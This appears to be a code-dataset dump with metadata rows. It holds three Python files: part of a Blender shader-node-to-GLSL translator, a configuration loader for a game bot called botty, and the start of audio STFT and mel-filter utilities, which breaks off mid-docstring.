write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_MUSGRAVE':
# Fall back to noise
curshader.add_function(c_functions.str_tex_musgrave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'tex_musgrave_f({0} * {1} * 0.5)'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_NOISE':
curshader.add_function(c_functions.str_tex_noise)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'tex_noise({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_POINTDENSITY':
return '0.0'
elif node.type == 'TEX_VORONOI':
curshader.add_function(c_functions.str_tex_voronoi)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
if node.coloring == 'INTENSITY':
res = 'tex_voronoi({0} * {1}).a'.format(co, scale)
else: # CELLS
res = 'tex_voronoi({0} * {1}).r'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_WAVE':
curshader.add_function(c_functions.str_tex_wave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_wave_f({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'LIGHT_FALLOFF':
# Constant, linear, quadratic
# Shaders default to quadratic for now
return '1.0'
elif node.type == 'NORMAL':
nor = parse_vector_input(node.inputs[0])
return 'dot({0}, {1})'.format(to_vec3(node.outputs[0].default_value), nor)
elif node.type == 'VALTORGB': # ColorRamp
return '1.0'
elif node.type == 'MATH':
val1 = parse_value_input(node.inputs[0])
val2 = parse_value_input(node.inputs[1])
op = node.operation
if op == 'ADD':
out_val = '({0} + {1})'.format(val1, val2)
elif op == 'SUBTRACT':
out_val = '({0} - {1})'.format(val1, val2)
elif op == 'MULTIPLY':
out_val = '({0} * {1})'.format(val1, val2)
elif op == 'DIVIDE':
out_val = '({0} / {1})'.format(val1, val2)
elif op == 'POWER':
out_val = 'pow({0}, {1})'.format(val1, val2)
elif op == 'LOGARITHM':
out_val = 'log({0})'.format(val1)
elif op == 'SQRT':
out_val = 'sqrt({0})'.format(val1)
elif op == 'ABSOLUTE':
out_val = 'abs({0})'.format(val1)
elif op == 'MINIMUM':
out_val = 'min({0}, {1})'.format(val1, val2)
elif op == 'MAXIMUM':
out_val = 'max({0}, {1})'.format(val1, val2)
elif op == 'LESS_THAN':
out_val = 'float({0} < {1})'.format(val1, val2)
elif op == 'GREATER_THAN':
out_val = 'float({0} > {1})'.format(val1, val2)
elif op == 'ROUND':
# out_val = 'round({0})'.format(val1)
out_val = 'floor({0} + 0.5)'.format(val1)
elif op == 'FLOOR':
out_val = 'floor({0})'.format(val1)
elif op == 'CEIL':
out_val = 'ceil({0})'.format(val1)
elif op == 'FRACT':
out_val = 'fract({0})'.format(val1)
elif op == 'MODULO':
# out_val = 'float({0} % {1})'.format(val1, val2)
out_val = 'mod({0}, {1})'.format(val1, val2)
elif op == 'SINE':
out_val = 'sin({0})'.format(val1)
elif op == 'COSINE':
out_val = 'cos({0})'.format(val1)
elif op == 'TANGENT':
out_val = 'tan({0})'.format(val1)
elif op == 'ARCSINE':
out_val = 'asin({0})'.format(val1)
elif op == 'ARCCOSINE':
out_val = 'acos({0})'.format(val1)
elif op == 'ARCTANGENT':
out_val = 'atan({0})'.format(val1)
elif op == 'ARCTAN2':
out_val = 'atan({0}, {1})'.format(val1, val2)
if node.use_clamp:
return 'clamp({0}, 0.0, 1.0)'.format(out_val)
else:
return out_val
elif node.type == 'RGBTOBW':
col = parse_vector_input(node.inputs[0])
return '((({0}.r * 0.3 + {0}.g * 0.59 + {0}.b * 0.11) / 3.0) * 2.5)'.format(col)
elif node.type == 'SEPHSV':
return '0.0'
elif node.type == 'SEPRGB':
col = parse_vector_input(node.inputs[0])
if socket == node.outputs[0]:
return '{0}.r'.format(col)
elif socket == node.outputs[1]:
return '{0}.g'.format(col)
elif socket == node.outputs[2]:
return '{0}.b'.format(col)
elif node.type == 'SEPXYZ':
vec = parse_vector_input(node.inputs[0])
if socket == node.outputs[0]:
return '{0}.x'.format(vec)
elif socket == node.outputs[1]:
return '{0}.y'.format(vec)
elif socket == node.outputs[2]:
return '{0}.z'.format(vec)
elif node.type == 'VECT_MATH':
vec1 = parse_vector_input(node.inputs[0])
vec2 = parse_vector_input(node.inputs[1])
op = node.operation
if op == 'DOT_PRODUCT':
return 'dot({0}, {1})'.format(vec1, vec2)
else:
return '0.0'
##
def vector_curve(name, fac, points):
# Write Ys array
ys_var = name + '_ys'
curshader.write('float {0}[{1}];'.format(ys_var, len(points))) # TODO: Make const
for i in range(0, len(points)):
curshader.write('{0}[{1}] = {2};'.format(ys_var, i, points[i].location[1]))
# Get index
fac_var = name + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
index = '0'
for i in range(1, len(points)):
index += ' + ({0} > {1} ? 1 : 0)'.format(fac_var, points[i].location[0])
# Write index
index_var = name + '_i'
curshader.write('int {0} = {1};'.format(index_var, index))
# Linear
# Write Xs array
facs_var = name + '_xs'
curshader.write('float {0}[{1}];'.format(facs_var, len(points))) # TODO: Make const
for i in range(0, len(points)):
curshader.write('{0}[{1}] = {2};'.format(facs_var, i, points[i].location[0]))
# Map vector
return 'mix({0}[{1}], {0}[{1} + 1], ({2} - {3}[{1}]) * (1.0 / ({3}[{1} + 1] - {3}[{1}]) ))'.format(ys_var, index_var, fac_var, facs_var)
def write_normal(inp):
if inp.is_linked and inp.links[0].from_node.type != 'GROUP_INPUT':
normal_res = parse_vector_input(inp)
if normal_res != None:
curshader.write('n = {0};'.format(normal_res))
def is_parsed(s):
global parsed
return s in parsed
def res_var_name(node, socket):
return node_name(node.name) + '_' + safesrc(socket.name) + '_res'
def write_result(l):
global parsed
res_var = res_var_name(l.from_node, l.from_socket)
# Unparsed node
if not is_parsed(res_var):
parsed[res_var] = True
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
res = parse_vector(l.from_node, l.from_socket)
if res == None:
return None
curshader.write('vec3 {0} = {1};'.format(res_var, res))
elif st == 'VALUE':
res = parse_value(l.from_node, l.from_socket)
if res == None:
return None
curshader.write('float {0} = {1};'.format(res_var, res))
# Normal map already parsed, return
elif l.from_node.type == 'NORMAL_MAP':
return None
return res_var
def glsl_type(t):
if t == 'RGB' or t == 'RGBA' or t == 'VECTOR':
return 'vec3'
else:
return 'float'
def to_uniform(inp):
uname = safesrc(inp.node.name) + safesrc(inp.name)
curshader.add_uniform(glsl_type(inp.type) + ' ' + uname)
return uname
def store_var_name(node):
return node_name(node.name) + '_store'
def texture_store(node, tex, tex_name, to_linear=False, tex_link=None):
global sample_bump
global sample_bump_res
global parsed
tex_store = store_var_name(node)
if is_parsed(tex_store):
return tex_store
parsed[tex_store] = True
mat_bind_texture(tex)
con.add_elem('tex', 'short2norm')
curshader.add_uniform('sampler2D {0}'.format(tex_name), link=tex_link)
if node.inputs[0].is_linked:
uv_name = parse_vector_input(node.inputs[0])
uv_name = 'vec2({0}.x, 1.0 - {0}.y)'.format(uv_name)
else:
uv_name = 'texCoord'
triplanar = node.projection == 'BOX'
if triplanar:
curshader.write(f'vec3 texCoordBlend = vec3(0.0); vec2 {uv_name}1 = vec2(0.0); vec2 {uv_name}2 = vec2(0.0);') # Temp
curshader.write(f'vec4 {tex_store} = vec4(0.0, 0.0, 0.0, 0.0);')
curshader.write(f'if (texCoordBlend.x > 0) {tex_store} += texture({tex_name}, {uv_name}.xy) * texCoordBlend.x;')
curshader.write(f'if (texCoordBlend.y > 0) {tex_store} += texture({tex_name}, {uv_name}1.xy) * texCoordBlend.y;')
curshader.write(f'if (texCoordBlend.z > 0) {tex_store} += texture({tex_name}, {uv_name}2.xy) * texCoordBlend.z;')
else:
if mat_texture_grad():
curshader.write('vec4 {0} = textureGrad({1}, {2}.xy, g2.xy, g2.zw);'.format(tex_store, tex_name, uv_name))
else:
curshader.write('vec4 {0} = texture({1}, {2}.xy);'.format(tex_store, tex_name, uv_name))
if sample_bump:
sample_bump_res = tex_store
curshader.write('float {0}_1 = textureOffset({1}, {2}.xy, ivec2(-2, 0)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_2 = textureOffset({1}, {2}.xy, ivec2(2, 0)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_3 = textureOffset({1}, {2}.xy, ivec2(0, -2)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_4 = textureOffset({1}, {2}.xy, ivec2(0, 2)).r;'.format(tex_store, tex_name, uv_name))
sample_bump = False
if to_linear:
curshader.write('{0}.rgb = pow({0}.rgb, vec3(2.2));'.format(tex_store))
return tex_store
def write_bump(node, res, scl=0.001):
global sample_bump
global sample_bump_res
sample_bump_res = store_var_name(node) + '_bump'
# Testing.. get function parts..
ar = res.split('(', 1)
pre = ar[0] + '('
if ',' in ar[1]:
ar2 = ar[1].split(',', 1)
co = ar2[0]
post = ',' + ar2[1]
else:
co = ar[1][:-1]
post = ')'
curshader.write('float {0}_1 = {1}{2} + vec3(-{4}, 0.0, 0.0){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_2 = {1}{2} + vec3({4}, 0.0, {4}){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_3 = {1}{2} + vec3(0.0, -{4}, 0.0){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_4 = {1}{2} + vec3(0.0, {4}, -{4}){3};'.format(sample_bump_res, pre, co, post, scl))
sample_bump = False
def to_vec1(v):
return str(v)
def to_vec3(v):
return 'vec3({0}, {1}, {2})'.format(v[0], v[1], v[2])
def node_by_type(nodes, ntype):
for n in nodes:
if n.type == ntype:
return n
def socket_index(node, socket):
for i in range(0, len(node.outputs)):
if node.outputs[i] == socket:
return i
def node_name(s):
for p in parents:
s = p.name + '_' + s
if curshader.write_textures > 0:
s += '_texread'
s = safesrc(s)
if '__' in s: # Consecutive _ are reserved
s = s.replace('_', '_x')
return s
##
def make_texture(image_node, tex_name, matname=None):
tex = {}
tex['name'] = tex_name
image = image_node.image
if matname is None:
matname = mat_state.material.name
if image is None:
return None
# Get filepath
filepath = image.filepath
if filepath == '':
if image.packed_file is not None:
filepath = './' + image.name
has_ext = filepath.endswith(('.jpg', '.png', '.hdr'))
if not has_ext:
# Raw bytes, write converted .jpg to /unpacked
filepath += '.raw'
elif image.source == "GENERATED":
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
filepath = os.path.join(unpack_path, image.name + ".jpg")
arm.utils.convert_image(image, filepath, "JPEG")
else:
arm.log.warn(matname + '/' + image.name + ' - invalid file path')
return None
# Reference image name
texpath = arm.utils.asset_path(filepath)
texfile = arm.utils.extract_filename(filepath)
tex['file'] = arm.utils.safestr(texfile)
s = tex['file'].rsplit('.', 1)
if len(s) == 1:
arm.log.warn(matname + '/' + image.name + ' - file extension required for image name')
return None
ext = s[1].lower()
do_convert = ext not in ('jpg', 'png', 'hdr', 'mp4') # Convert image
if do_convert:
new_ext = 'png' if (ext in ('tga', 'dds')) else 'jpg'
tex['file'] = tex['file'].rsplit('.', 1)[0] + '.' + new_ext
if image.packed_file is not None or not is_ascii(texfile):
# Extract packed data / copy non-ascii texture
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
unpack_filepath = os.path.join(unpack_path, tex['file'])
if do_convert:
if not os.path.isfile(unpack_filepath):
fmt = 'PNG' if new_ext == 'png' else 'JPEG'
arm.utils.convert_image(image, unpack_filepath, file_format=fmt)
else:
# Write bytes if size is different or file does not exist yet
if image.packed_file is not None:
if not os.path.isfile(unpack_filepath) or os.path.getsize(unpack_filepath) != image.packed_file.size:
with open(unpack_filepath, 'wb') as f:
f.write(image.packed_file.data)
# Copy non-ascii texture
else:
if not os.path.isfile(unpack_filepath) or os.path.getsize(unpack_filepath) != os.path.getsize(texpath):
shutil.copy(texpath, unpack_filepath)
arm.assets.add(unpack_filepath)
else:
if not os.path.isfile(arm.utils.asset_path(filepath)):
arm.log.warn('Material ' + matname + '/' + image.name + ' - file not found(' + filepath + ')')
return None
if do_convert:
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
converted_path = os.path.join(unpack_path, tex['file'])
# TODO: delete cache when file changes
if not os.path.isfile(converted_path):
fmt = 'PNG' if new_ext == 'png' else 'JPEG'
arm.utils.convert_image(image, converted_path, file_format=fmt)
arm.assets.add(converted_path)
else:
# Link image path to assets
# TODO: Khamake converts .PNG to .jpg? Convert ext to lowercase on windows
if arm.utils.get_os() == 'win':
s = filepath.rsplit('.', 1)
arm.assets.add(arm.utils.asset_path(s[0] + '.' + s[1].lower()))
else:
arm.assets.add(arm.utils.asset_path(filepath))
# if image_format != 'RGBA32':
# tex['format'] = image_format
interpolation = image_node.interpolation
rpdat = arm.utils.get_rp()
texfilter = rpdat.arm_texture_filter
if texfilter == 'Anisotropic':
interpolation = 'Smart'
elif texfilter == 'Linear':
interpolation = 'Linear'
elif texfilter == 'Point':
interpolation = 'Closest'
# TODO: Blender seems to load full images on size request, cache size instead
powimage = is_pow(image.size[0]) and is_pow(image.size[1])
if interpolation == 'Cubic': # Mipmap linear
tex['mipmap_filter'] = 'linear'
tex['generate_mipmaps'] = True
elif interpolation == 'Smart': # Mipmap anisotropic
tex['min_filter'] = 'anisotropic'
tex['mipmap_filter'] = 'linear'
tex['generate_mipmaps'] = True
elif interpolation == 'Closest':
tex['min_filter'] = 'point'
tex['mag_filter'] = 'point'
# else defaults to linear
if image_node.extension != 'REPEAT': # Extend or clip
tex['u_addressing'] = 'clamp'
tex['v_addressing'] = 'clamp'
if image.source == 'MOVIE':
tex['source'] = 'movie'
tex['min_filter'] = 'linear'
tex['mag_filter'] = 'linear'
tex['mipmap_filter'] = 'no'
tex['generate_mipmaps'] = False
return tex
def is_pow(num):
return ((num & (num - 1)) == 0) and num != 0
def is_ascii(s):
return len(s) == len(s.encode())
##
def get_rp_renderer():
return arm.utils.get_rp().rp_renderer
def get_arm_export_tangents():
return bpy.data.worlds['Arm'].arm_export_tangents
def safesrc(name):
return arm.utils.safesrc(name)
def get_sdk_path():
return arm.utils.get_sdk_path()
def disp_enabled():
return arm.utils.disp_enabled(arm.make_state.target)
def warn(text):
arm.log.warn(text)
def assets_add(path):
arm.assets.add(path)
def assets_add_embedded_data(path):
arm.assets.add_embedded_data(path)
def mat_name():
return mat_state.material.name
def mat_batch():
return mat_state.batch
def mat_bind_texture(tex):
mat_state.bind_textures.append(tex)
def mat_texture_grad():
return mat_state.texture_grad
def mat_get_material():
return mat_state.material
def mat_get_material_users():
return mat_state.mat_users
| 39.207601
| 185
| 0.567568
| 9,286
| 69,123
| 4.049968
| 0.081305
| 0.053978
| 0.061822
| 0.039353
| 0.619443
| 0.539965
| 0.481733
| 0.437806
| 0.397043
| 0.379786
| 0
| 0.048285
| 0.283017
| 69,123
| 1,762
| 186
| 39.229852
| 0.710553
| 0.081521
| 0
| 0.48317
| 0
| 0.023843
| 0.146301
| 0.003589
| 0
| 0
| 0
| 0.000568
| 0
| 1
| 0.031557
| false
| 0.003506
| 0.007013
| 0.01122
| 0.181627
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c4ffee559cb6b71ce9c01f453a956254f1cdb8a
| 9,981
|
py
|
Python
|
src/config.py
|
Jizanator/botty
|
3026de0d4c03f4e797ed92dedb8fdfdf9cf1462e
|
[
"MIT"
] | null | null | null |
src/config.py
|
Jizanator/botty
|
3026de0d4c03f4e797ed92dedb8fdfdf9cf1462e
|
[
"MIT"
] | null | null | null |
src/config.py
|
Jizanator/botty
|
3026de0d4c03f4e797ed92dedb8fdfdf9cf1462e
|
[
"MIT"
] | null | null | null |
import configparser
import numpy as np
import os
class Config:
def _select_val(self, section: str, key: str = None):
if section in self._custom and key in self._custom[section]:
return self._custom[section][key]
elif section in self._config:
return self._config[section][key]
elif section in self._pickit_config:
return self._pickit_config[section][key]
elif section in self._shop_config:
return self._shop_config[section][key]
else:
return self._game_config[section][key]
def __init__(self, print_warnings: bool = False):
# print_warnings, what a hack... here it is, not making the effort
# passing a single config instance through bites me in the ass
self._print_warnings = print_warnings
self._config = configparser.ConfigParser()
self._config.read('config/params.ini')
self._game_config = configparser.ConfigParser()
self._game_config.read('config/game.ini')
self._pickit_config = configparser.ConfigParser()
self._pickit_config.read('config/pickit.ini')
self._shop_config = configparser.ConfigParser()
self._shop_config.read('config/shop.ini')
self._custom = configparser.ConfigParser()
if os.environ.get('RUN_ENV') != "test" and os.path.exists('config/custom.ini'):
self._custom.read('config/custom.ini')
self.general = {
"saved_games_folder": self._select_val("general", "saved_games_folder"),
"name": self._select_val("general", "name"),
"monitor": int(self._select_val("general", "monitor")),
"max_game_length_s": float(self._select_val("general", "max_game_length_s")),
"exit_key": self._select_val("general", "exit_key"),
"resume_key": self._select_val("general", "resume_key"),
"auto_settings_key": self._select_val("general", "auto_settings_key"),
"graphic_debugger_key": self._select_val("general", "graphic_debugger_key"),
"logg_lvl": self._select_val("general", "logg_lvl"),
"randomize_runs": bool(int(self._select_val("general", "randomize_runs"))),
"difficulty": self._select_val("general", "difficulty"),
"custom_message_hook": self._select_val("general", "custom_message_hook"),
"discord_status_count": False if not self._select_val("general", "discord_status_count") else int(self._select_val("general", "discord_status_count")),
"info_screenshots": bool(int(self._select_val("general", "info_screenshots"))),
"loot_screenshots": bool(int(self._select_val("general", "loot_screenshots"))),
}
# Added for dclone ip hunting
self.dclone = {
"region_ips": self._select_val("dclone", "region_ips"),
"dclone_hotip": self._select_val("dclone", "dclone_hotip"),
}
self.routes = {}
for key in self._config["routes"]:
self.routes[key] = bool(int(self._select_val("routes", key)))
self.char = {
"type": self._select_val("char", "type"),
"show_items": self._select_val("char", "show_items"),
"inventory_screen": self._select_val("char", "inventory_screen"),
"stand_still": self._select_val("char", "stand_still"),
"force_move": self._select_val("char", "force_move"),
"num_loot_columns": int(self._select_val("char", "num_loot_columns")),
"take_health_potion": float(self._select_val("char", "take_health_potion")),
"take_mana_potion": float(self._select_val("char", "take_mana_potion")),
"take_rejuv_potion_health": float(self._select_val("char", "take_rejuv_potion_health")),
"take_rejuv_potion_mana": float(self._select_val("char", "take_rejuv_potion_mana")),
"heal_merc": float(self._select_val("char", "heal_merc")),
"heal_rejuv_merc": float(self._select_val("char", "heal_rejuv_merc")),
"chicken": float(self._select_val("char", "chicken")),
"merc_chicken": float(self._select_val("char", "merc_chicken")),
"tp": self._select_val("char", "tp"),
"belt_rows": int(self._select_val("char", "belt_rows")),
"show_belt": self._select_val("char", "show_belt"),
"potion1": self._select_val("char", "potion1"),
"potion2": self._select_val("char", "potion2"),
"potion3": self._select_val("char", "potion3"),
"potion4": self._select_val("char", "potion4"),
"belt_rejuv_columns": int(self._select_val("char", "belt_rejuv_columns")),
"belt_hp_columns": int(self._select_val("char", "belt_hp_columns")),
"belt_mp_columns": int(self._select_val("char", "belt_mp_columns")),
"stash_gold": bool(int(self._select_val("char", "stash_gold"))),
"gold_trav_only": bool(int(self._select_val("char", "gold_trav_only"))),
"use_merc": bool(int(self._select_val("char", "use_merc"))),
"pre_buff_every_run": bool(int(self._select_val("char", "pre_buff_every_run"))),
"cta_available": bool(int(self._select_val("char", "cta_available"))),
"weapon_switch": self._select_val("char", "weapon_switch"),
"battle_orders": self._select_val("char", "battle_orders"),
"battle_command": self._select_val("char", "battle_command"),
"casting_frames": int(self._select_val("char", "casting_frames")),
"atk_len_trav": float(self._select_val("char", "atk_len_trav")),
"atk_len_pindle": float(self._select_val("char", "atk_len_pindle")),
"atk_len_eldritch": float(self._select_val("char", "atk_len_eldritch")),
"atk_len_shenk": float(self._select_val("char", "atk_len_shenk")),
"atk_len_nihlatak": float(self._select_val("char", "atk_len_nihlatak")),
"hork_time_pindle": float(self._select_val("char", "hork_time_pindle")),
"hork_time_eldritch": float(self._select_val("char", "hork_time_eldritch")),
"hork_time_shenk": float(self._select_val("char", "hork_time_shenk")),
"hork_time_council": float(self._select_val("char", "hork_time_council")),
"hork_time_nihlatak": float(self._select_val("char", "hork_time_nihlatak")),
}
self.sorceress = dict(self._config["sorceress"])
if "sorceress" in self._custom:
self.sorceress.update(dict(self._custom["sorceress"]))
self.hammerdin = self._config["hammerdin"]
if "hammerdin" in self._custom:
self.hammerdin.update(self._custom["hammerdin"])
self.trapsin = self._config["trapsin"]
if "trapsin" in self._custom:
self.trapsin.update(self._custom["trapsin"])
self.barbarian = self._config["barbarian"]
if "barbarian" in self._custom:
self.barbarian.update(self._custom["barbarian"])
self.advanced_options = {
"pathing_delay_factor": min(max(int(self._select_val("advanced_options", "pathing_delay_factor")), 1), 10),
"message_headers": self._select_val("advanced_options", "message_headers"),
"message_body_template": self._select_val("advanced_options", "message_body_template"),
"message_highlight": bool(int(self._select_val("advanced_options", "message_highlight"))),
}
self.items = {}
for key in self._pickit_config["items"]:
self.items[key] = int(self._select_val("items", key))
if self.items[key] and not os.path.exists(f"./assets/items/{key}.png") and self._print_warnings:
print(f"Warning: You activated {key} in pickit, but there is no img available in assets/items")
self.colors = {}
for key in self._game_config["colors"]:
self.colors[key] = np.split(np.array([int(x) for x in self._select_val("colors", key).split(",")]), 2)
self.ui_pos = {}
for key in self._game_config["ui_pos"]:
self.ui_pos[key] = int(self._select_val("ui_pos", key))
self.ui_roi = {}
for key in self._game_config["ui_roi"]:
self.ui_roi[key] = np.array([int(x) for x in self._select_val("ui_roi", key).split(",")])
self.path = {}
for key in self._game_config["path"]:
self.path[key] = np.reshape(np.array([int(x) for x in self._select_val("path", key).split(",")]), (-1, 2))
self.shop = {
"shop_trap_claws": bool(int(self._select_val("claws", "shop_trap_claws"))),
"shop_melee_claws": bool(int(self._select_val("claws", "shop_melee_claws"))),
"shop_3_skills_ias_gloves": bool(int(self._select_val("gloves", "shop_3_skills_ias_gloves"))),
"shop_2_skills_ias_gloves": bool(int(self._select_val("gloves", "shop_2_skills_ias_gloves"))),
"trap_min_score": int(self._select_val("claws", "trap_min_score")),
"melee_min_score": int(self._select_val("claws", "melee_min_score")),
}
if __name__ == "__main__":
config = Config(print_warnings=True)
# Check if any added items miss templates
for k in config.items:
if not os.path.exists(f"./assets/items/{k}.png"):
print(f"Template not found: {k}")
# Check if any item templates miss a config
for filename in os.listdir(f'assets/items'):
filename = filename.lower()
if filename.endswith('.png'):
item_name = filename[:-4]
blacklist_item = item_name.startswith("bl__")
if item_name not in config.items and not blacklist_item:
print(f"Config not found for: " + filename)
| 55.45
| 164
| 0.616772
| 1,230
| 9,981
| 4.631707
| 0.173984
| 0.123223
| 0.175707
| 0.128313
| 0.371424
| 0.309286
| 0.223451
| 0.056521
| 0.031596
| 0.031596
| 0
| 0.002484
| 0.233644
| 9,981
| 179
| 165
| 55.759777
| 0.742319
| 0.023545
| 0
| 0
| 0
| 0
| 0.295576
| 0.028867
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013158
| false
| 0
| 0.019737
| 0
| 0.072368
| 0.046053
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c50b18cade6c81fd3dffac9c31804d4407603cf
| 19,446
|
py
|
Python
|
aps/transform/utils.py
|
haoxiangsnr/aps
|
38f77139b54553b0cb04b26a833bebbbf3177c5e
|
[
"Apache-2.0"
] | 2
|
2021-06-17T20:29:02.000Z
|
2021-09-18T01:56:36.000Z
|
aps/transform/utils.py
|
haoxiangsnr/aps
|
38f77139b54553b0cb04b26a833bebbbf3177c5e
|
[
"Apache-2.0"
] | null | null | null |
aps/transform/utils.py
|
haoxiangsnr/aps
|
38f77139b54553b0cb04b26a833bebbbf3177c5e
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 Jian Wu
# License: Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
import math
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as tf
import librosa.filters as filters
from aps.const import EPSILON
from typing import Optional, Union, Tuple
def init_window(wnd: str, frame_len: int) -> th.Tensor:
"""
Return window coefficient
Args:
wnd: window name
frame_len: length of the frame
"""
def sqrthann(frame_len, periodic=True):
return th.hann_window(frame_len, periodic=periodic)**0.5
if wnd not in ["bartlett", "hann", "hamm", "blackman", "rect", "sqrthann"]:
raise RuntimeError(f"Unknown window type: {wnd}")
wnd_tpl = {
"sqrthann": sqrthann,
"hann": th.hann_window,
"hamm": th.hamming_window,
"blackman": th.blackman_window,
"bartlett": th.bartlett_window,
"rect": th.ones
}
if wnd != "rect":
# match with librosa
c = wnd_tpl[wnd](frame_len, periodic=True)
else:
c = wnd_tpl[wnd](frame_len)
return c
def init_kernel(frame_len: int,
frame_hop: int,
window: str,
round_pow_of_two: bool = True,
normalized: bool = False,
inverse: bool = False,
mode: str = "librosa") -> th.Tensor:
"""
Return STFT kernels
Args:
frame_len: length of the frame
frame_hop: hop size between frames
window: window name
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: return normalized DFT matrix
inverse: return iDFT matrix
mode: framing mode (librosa or kaldi)
"""
if mode not in ["librosa", "kaldi"]:
raise ValueError(f"Unsupported mode: {mode}")
# FFT points
B = 2**math.ceil(math.log2(frame_len)) if round_pow_of_two else frame_len
# center padding window if needed
if mode == "librosa" and B != frame_len:
lpad = (B - frame_len) // 2
window = tf.pad(window, (lpad, B - frame_len - lpad))
if normalized:
# make K^H * K = I
S = B**0.5
else:
S = 1
I = th.stack([th.eye(B), th.zeros(B, B)], dim=-1)
# W x B x 2
K = th.fft(I / S, 1)
if mode == "kaldi":
K = K[:frame_len]
if inverse and not normalized:
# to make K^H * K = I
K = K / B
# 2 x B x W
K = th.transpose(K, 0, 2) * window
# 2B x 1 x W
K = th.reshape(K, (B * 2, 1, K.shape[-1]))
return K, window
def mel_filter(frame_len: int,
round_pow_of_two: bool = True,
num_bins: Optional[int] = None,
sr: int = 16000,
num_mels: int = 80,
fmin: float = 0.0,
fmax: Optional[float] = None,
norm: bool = False) -> th.Tensor:
"""
Return mel filter coefficients
Args:
frame_len: length of the frame
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
num_bins: number of the frequency bins produced by STFT
num_mels: number of the mel bands
fmin: lowest frequency (in Hz)
fmax: highest frequency (in Hz)
norm: normalize the mel filter coefficients
"""
# FFT points
if num_bins is None:
N = 2**math.ceil(
math.log2(frame_len)) if round_pow_of_two else frame_len
else:
N = (num_bins - 1) * 2
# fmin & fmax
freq_upper = sr // 2
if fmax is None:
fmax = freq_upper
else:
fmax = min(fmax + freq_upper if fmax < 0 else fmax, freq_upper)
fmin = max(0, fmin)
# mel filter coefficients
mel = filters.mel(sr,
N,
n_mels=num_mels,
fmax=fmax,
fmin=fmin,
htk=True,
norm="slaney" if norm else None)
# num_mels x (N // 2 + 1)
return th.tensor(mel, dtype=th.float32)
def speed_perturb_filter(src_sr: int,
dst_sr: int,
cutoff_ratio: float = 0.95,
num_zeros: int = 64) -> th.Tensor:
"""
Return speed perturb filters, reference:
https://github.com/danpovey/filtering/blob/master/lilfilter/resampler.py
Args:
src_sr: sample rate of the source signal
dst_sr: sample rate of the target signal
Return:
weight (Tensor): coefficients of the filter
"""
if src_sr == dst_sr:
raise ValueError(
f"src_sr should not be equal to dst_sr: {src_sr}/{dst_sr}")
gcd = math.gcd(src_sr, dst_sr)
src_sr = src_sr // gcd
dst_sr = dst_sr // gcd
if src_sr == 1 or dst_sr == 1:
raise ValueError("do not support integer downsample/upsample")
zeros_per_block = min(src_sr, dst_sr) * cutoff_ratio
padding = 1 + int(num_zeros / zeros_per_block)
# dst_sr x src_sr x K
times = (np.arange(dst_sr)[:, None, None] / float(dst_sr) -
np.arange(src_sr)[None, :, None] / float(src_sr) -
np.arange(2 * padding + 1)[None, None, :] + padding)
window = np.heaviside(1 - np.abs(times / padding),
0.0) * (0.5 + 0.5 * np.cos(times / padding * math.pi))
weight = np.sinc(
times * zeros_per_block) * window * zeros_per_block / float(src_sr)
return th.tensor(weight, dtype=th.float32)
def splice_feature(feats: th.Tensor,
lctx: int = 1,
rctx: int = 1,
subsampling_factor: int = 1,
op: str = "cat") -> th.Tensor:
"""
Splice feature
Args:
feats (Tensor): N x ... x T x F, original feature
